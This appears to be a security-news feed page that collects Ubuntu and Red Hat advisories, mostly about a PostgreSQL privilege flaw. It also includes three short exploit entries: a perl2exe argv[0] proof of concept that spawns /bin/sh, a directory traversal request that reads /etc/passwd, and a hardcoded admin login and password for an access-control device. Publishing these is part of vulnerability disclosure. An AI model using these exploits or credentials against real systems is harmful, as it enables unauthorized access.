Ubuntu Security Notice 6656-1 - It was discovered that PostgreSQL incorrectly handled dropping privileges when handling REFRESH MATERIALIZED VIEW CONCURRENTLY commands. If a user or automatic system were tricked into running a specially crafted command, a remote attacker could possibly use this issue to execute arbitrary SQL functions.

==========================================================================  
Ubuntu Security Notice USN-6656-1  
February 26, 2024

postgresql-12, postgresql-14, postgresql-15 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PostgreSQL could be made to run arbitrary SQL.

Software Description:  
- postgresql-15: Object-relational SQL database  
- postgresql-14: Object-relational SQL database  
- postgresql-12: Object-relational SQL database

Details:

It was discovered that PostgreSQL incorrectly handled dropping privileges  
when handling REFRESH MATERIALIZED VIEW CONCURRENTLY commands. If a user or  
automatic system were tricked into running a specially crafted command, a  
remote attacker could possibly use this issue to execute arbitrary SQL  
functions.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   postgresql-15                   15.6-0ubuntu0.23.10.1  
   postgresql-client-15            15.6-0ubuntu0.23.10.1

Ubuntu 22.04 LTS:  
   postgresql-14                   14.11-0ubuntu0.22.04.1  
   postgresql-client-14            14.11-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   postgresql-12                   12.18-0ubuntu0.20.04.1  
   postgresql-client-12            12.18-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6656-1  
   CVE-2024-0985

Package Information:  
   https://launchpad.net/ubuntu/+source/postgresql-15/15.6-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/postgresql-14/14.11-0ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/postgresql-12/12.18-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6656-1

Executables created with perl2exe versions 30.10C and below suffer from an arbitrary code execution vulnerability.

    # Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution# Date: 10/17/2023# Exploit Author: decrazyo# Vendor Homepage: https://www.indigostar.com/# Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz# Version: <= V30.10C# Tested on: Ubuntu 22.04# Description:perl2exe packs perl scripts into native executables.Those executables use their 0th argument to locate a file to unpack and execute.Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument.That can be useful for breaking out of restricted shell environments.# Proof and Concept:user@testing:~/example$ lsp2x-30.10-Linux-x64-5.30.1.tar.gz  perl2exe-Linux-x64-5.30.1user@testing:~/example$ user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pluser@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.plPerl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software...Generating safeuser@testing:~/example$ user@testing:~/example$ # Check that the program executes as expected.user@testing:~/example$ ./safeI am completely safeuser@testing:~/example$ user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pluser@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.plPerl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software...Generating malicioususer@testing:~/example$ user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.user@testing:~/example$ chmod -x malicioususer@testing:~/example$ ./malicious-bash: ./malicious: Permission denieduser@testing:~/example$ user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.user@testing:~/example$ bash -c 'exec -a malicious ./safe'j/k I am malicious AF$ pstree -s $$systemd───sshd───sshd───sshd───bash───safe───sh───pstree$

perl2exe 30.10C Arbitrary Code Execution

Automatic-Systems SOC FL9600 FastLine version V06 has hardcoded credentials for super admin functionality.

    # Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin# Google Dork: # Date: 12/9/2023# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure# Vendor Homepage: http://automatic-systems.com# Software Link: # Version: V06# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a# CVE : CVE-2023-37608An issue in Automatic Systems SOC FL9600 FastLine version:V06 a remote attacker to obtain sensitive information via the admin login credentials.The device contains hardcoded login and password for super admin. The administrator cannot change the password for this account.Login: automaticsystemsPassword: astech

Automatic-Systems SOC FL9600 FastLine Hardcoded Credentials

Automatic-Systems SOC FL9600 FastLine version V06 suffers from a directory traversal vulnerability.

Change Mirror Download

    # Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal# Google Dork: # Date: 12/9/2023# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure# Vendor Homepage: http://automatic-systems.com# Software Link: # Version: V06# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a# CVE : CVE-2023-37607Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd

Automatic-Systems SOC FL9600 FastLine Directory Traversal

Red Hat Security Advisory 2024-0998-03 - Red Hat OpenShift distributed tracing 3.1.0.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0998.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: Red Hat OpenShift distributed tracing 3.1.0 operator/operand containersAdvisory ID:        RHSA-2024:0998-03Product:            Red Hat OpenShift distributed tracingAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0998Issue date:         2024-02-27Revision:           03CVE Names:          CVE-2023-26159====================================================================Summary: Red Hat OpenShift distributed tracing 3.1.0Red Hat Product Security has rated this update as having a security impact of "Low". A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Release of Red Hat OpenShift distributed tracing provides these changes: OpenTelemetry: support for target allocator. Tempo: Monolithic CRD, alerting for span RED metrics, TraceQL support for gateway. OpenTelemetry version 0.93.0. Tempo 2.3.1, Jaeger 1.53.0.Security Fix(es):CVE-2023-26159 follow-redirects: Improper Input Validation due to the improper handling of URLs by the url.parse()Solution:CVEs:CVE-2023-26159References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2256413https://issues.redhat.com/browse/TRACING-3135https://issues.redhat.com/browse/TRACING-3573https://issues.redhat.com/browse/TRACING-3717https://issues.redhat.com/browse/TRACING-3718https://issues.redhat.com/browse/TRACING-3719https://issues.redhat.com/browse/TRACING-3746https://issues.redhat.com/browse/TRACING-3756https://issues.redhat.com/browse/TRACING-3786https://issues.redhat.com/browse/TRACING-3787https://issues.redhat.com/browse/TRACING-3808https://issues.redhat.com/browse/TRACING-3810

Red Hat Security Advisory 2024-0998-03

Red Hat Security Advisory 2024-0992-03 - An update for rh-postgresql10-postgresql is now available for Red Hat Software Collections.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0992.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-postgresql10-postgresql security updateAdvisory ID:        RHSA-2024:0992-03Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0992Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for rh-postgresql10-postgresql is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0992-03

Red Hat Security Advisory 2024-0990-03 - An update for rh-postgresql12-postgresql is now available for Red Hat Software Collections.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0990.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-postgresql12-postgresql security updateAdvisory ID:        RHSA-2024:0990-03Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0990Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for rh-postgresql12-postgresql is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS). Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0990-03

Red Hat Security Advisory 2024-0989-03 - Red Hat Multicluster GlobalHub 1.0.2 General Availability release images, which fix bugs, provide security updates, and update container images. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0989.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Red Hat Multicluster GlobalHub 1.0.2 bug fixes and security updatesAdvisory ID:        RHSA-2024:0989-03Product:            multicluster-globalhubAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0989Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2023-49568====================================================================Summary: Red Hat Multicluster GlobalHub 1.0.2 GeneralAvailability release images, which fix bugs, provide security updates, and update container images.Red Hat Product Security has rated this update as having a security impactof Critical. A Common Vulnerability Scoring System (CVSS) base score,which gives a detailed severity rating, is available for each vulnerabilityfrom the CVE links in the References section.Description:Red Hat Multicluster GlobalHub 1.0.2 imagesThis advisory contains the container images for Red Hat MulticlusterGlobalHub, which fix several bugs.Security fix(es):CVE-2023-49568 go-git: Maliciously crafted Git server replies can cause DoS ongo-git clientsCVE-2023-49569 go-git: Maliciously crafted Git server replies can lead to pathtraversal and RCE on go-git clientsSolution:https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html-single/multicluster_global_hub/indexCVEs:CVE-2023-49568References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0989-03

Red Hat Security Advisory 2024-0988-03 - An update for rh-postgresql13-postgresql is now available for Red Hat Software Collections.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0988.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-postgresql13-postgresql security updateAdvisory ID:        RHSA-2024:0988-03Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0988Issue date:         2024-02-26Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for rh-postgresql13-postgresql is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS). Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0988-03

Red Hat Security Advisory 2024-0984-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0984.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:0984-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0984  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 115.8.0.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Source

Packet Storm